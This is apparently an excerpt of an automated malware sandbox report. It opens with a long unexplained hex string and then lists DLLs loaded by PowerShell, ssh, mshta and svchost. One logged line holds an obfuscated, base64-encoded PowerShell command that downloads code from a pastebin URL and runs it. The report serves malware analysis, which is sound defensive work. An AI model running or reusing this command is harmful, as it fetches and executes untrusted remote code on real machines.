3B30A504C24C3B832C6B0F7F82A720EEBFE712E1B11CD932C9E5C7D456C06867A74AD3A97F905CED36247B87F0625B42F75BA4945635B18A82EDF26E5861C329BFEADAF94CA576635764882B1CD7A6E75D104129FC224EBFBEB94A628CEA56F0A3828F40710143735DA31B592516964E704BB489E450292571ED1B8EE1F001AE77C6FC25B2078E74A31D038E1D03ACCA3C7C6A8FAB337C633522A66604A1BB8B9C555E3BBE6348CE9B111D471D213702C17F614C86FBF8FE91B3781D35DF5B128CC95ED1667145FE3B243E6951A9455CAEC033289D883DFB031E516E037E4A4668162AD2AD1D871E1870AFCE9730FA836626E94F80307146B75CF9E7AC57BC4DC6ADAC9FBAE30D68030AE39A44BC038FC72594DAE859A181023D142321D6A31CB9F0B84D661BEC72BF3124F1B60880A358FE25760E1BD0A0F6392FB0747B86C767385A6E06D6207459916C16AECB2F1F5BD994DB8CA214ECFE96CB37CA7850202770519A107DC62590038A540A914AFE664965B27756163566BE349ED77E33B9B52EB99797311123C2913E9DDAC39EB6ECFF220A911F4CBA4BBCA42E3EFE5F7A92756B074DA2DEB89D425B04034B270C25948C41781E22C34A0F380A6C22935256D47847BB6239FAF39D9D1FC1EA9D6E43EFCFB896C1D8816DD34CD7F6D433DB2ABBA7DDC692858222F86A44530FDDF5153E885D5B67441D8C8252EE75CA3C4D9808383692638135E3551937B256F7773F54A85E36840866A5B362F59589DED49A08715A66E8242C25BFAF5F34CD1E1C54FC418EADDDF6E597A520EE2A3D0436285A094388DF2F75DC594B5562E58F69BA6B5EC4606185875510834C2B4E4D185598FA71136E84C07D63A81B60FC526FCFCDC2687FB8F2A82163A586B78C9EF88F7BAAE26CFDC354883E02A310DCEFD9A626F0DC7297EB531ABE66B7A5C983397F08D52E357D101CC123AD37EA8123CD23FBB08BD4714C8F0417A9FC433BB55A6E1D2AF00F7A078FE782C81F40749B962591Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy RemoteSigned -Enc IAAgACAAWwBOAEUAVAAuAHMAZQByAFYASQBDAGUAcABvAGkAbgB0AE0AYQBOAGEAZwBFAHIAXQA6ADoAUwBlAEMAdQByAEkAVAB5AFAAUgBPAFQATwBDAG8ATAAgAAkACQA9ACAACQBbAE4AZQB0AC4AcwBFAGMAdQBSAGkAdABZAHAAUgBPAFQATwBjAG8ATABUAFkAcABFAF0AOgA6AFQAbABzACwAIAAgAFsAbgBlAFQALgBzAEUAQwBVAHIASQBUAHkAUABSAE8AVABPAEMATwBMAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAxACwAIAAJAFsAbgBlAFQALgBzAGUAQwBVAFIAaQB0AHkAUABSAE8AVABPAEMATwBsAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACwAIAAJAFsAbgBlAHQALgBzAEUAQwB1AHIAaQB0AHkAcABSAG8AVABvAGMAbwBsAHQAeQBwAEUAXQA6ADoAUwBzAGwAMwAgACAAOwAgAAkAIABbAG4ARQBUAC4AUwBFAHIAVgBpAEMARQBQAG8AaQBuAFQATQBBAE4AYQBnAGUAUgBdADoAOgBTAGUAQwBVAFIAaQB0AHkAUAByAE8AdABPAGMAbwBsACAACQA9ACAACQAJACcAVABsAHMALAAgAAkAVABsAHMAMQAxACwAIAAgAAkAVABsAHMAMQAyACwAIAAJAFMAcwBsADMAJwAgACAACQA7ACAAIAAJAGkAZQB4ACgAIAAgACAASQB3AHIAIAAJAAkAKABbAGMAaABhAFIAXQAgACAACQAwAFgANgA4ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAYQBSAF0AIAAgAAkAMABYADcANAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAcgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAFIAXQAgACAACQAwAHgANwAwACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAYwBIAGEAcgBdACAAIAAJADAAWAAzAEEAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQBSAF0AIAAgAAkAMABYADIARgAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAcgBdACAAIAAJADAAWAA3ADAAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAHIAXQAgACAACQAwAHgANgAxACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAYQByAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAQwBIAEEAUgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABBAHIAXQAgACAACQAwAHgANgA1ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMABYADYAMgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAWAA2ADkAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAHgANgBFACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAQQByAF0AIAAgAAkAMABYADIARQAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAUgBdACAAIAAJADAAeAA2ADMAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAHIAXQAgACAACQAwAHgANgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMAB4ADYARAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAAyAEYAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAFgANwAyACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQByAF0AIAAgAAkAMAB4ADYAMQAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAA3ADcAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAYQByAF0AIAAgAAkAMAB4ADMAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBIAEEAcgBdACAAIAAJADAAWAA3ADYAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABBAFIAXQAgACAACQAwAFgAMwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMABYADUANgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAeAA2ADgAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABBAFIAXQAgACAACQAwAFgANwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAYQBSAF0AIAAgAAkAMABYADcAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBoAGEAcgBdACAAIAAJADAAeAA2ADIAIAAgAAkAKQApAA== Jump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dllJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
